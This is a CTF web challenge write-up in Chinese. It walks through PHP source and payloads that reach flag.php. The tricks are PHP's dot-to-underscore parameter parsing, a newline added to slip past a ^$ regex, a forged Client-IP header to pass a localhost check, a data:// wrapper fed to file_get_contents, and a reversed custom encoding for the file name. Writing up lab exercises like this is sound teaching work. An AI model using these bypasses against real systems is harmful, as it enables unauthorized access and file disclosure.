查看网页源码发现代码
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
查询(query)的字符串没有_或者%5f,否则die掉;GET获取的b_u_p_t不等于2333,但是必须以23333开头
所以这里需要进行绕过,可以利用php字符串的解析特性进行绕过
- 在解析查询字符串时会首先删除空白符,然后将将某些字符转换为下划线包括空格、.、%5f等
- 正则匹配中'^'和'$'代表的是行的开头和结尾,可以利用换行绕过
payload:
?b.u.p.t=23333%0a
提示flag在secrettw.php,访问secrettw.php
提示需要本地访问,使用插件修改ip访问还是失败
查看网页源码发现隐藏字符,全都是以( ) [ ] !+ 组成判断为jsfuck编码,只需要在console打印即可看到内容,CTF常见编码及特征
提示POST Merak参数
构造参数显示了隐藏的代码
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
}
条件:
- ip地址必须为127.0.0.1
- file_get_contents($_GET['2333']) 内容必须为todat is a happy day
绕过方法:
- 要求本地访问请求头中添加:client-ip: 127.0.0.1
- 使用php伪协议绕过file_get_contents:2333=data://text/plain,todat is a happy day,因为是get请求所以伪协议内容需要编码
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
条件允许后可以file_get_contents(change($_GET['file']))读取flag.php,但是这里先调用了change()函数,change()函数是将获取到的参数base64解码,然后每个字符的ASCII值加当前位置*2的数,所以这里绕过只需要先减当前位置*2的数,输入后还原为flag.php
<?php
$v = 'flag.php';
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
echo $re;
?>
fj]a&f\b
base64后:ZmpdYSZmXGI=
构造请求,得到flag
flag{c3ed5d3e-ff72-4c44-85bb-ec8264978fb8}
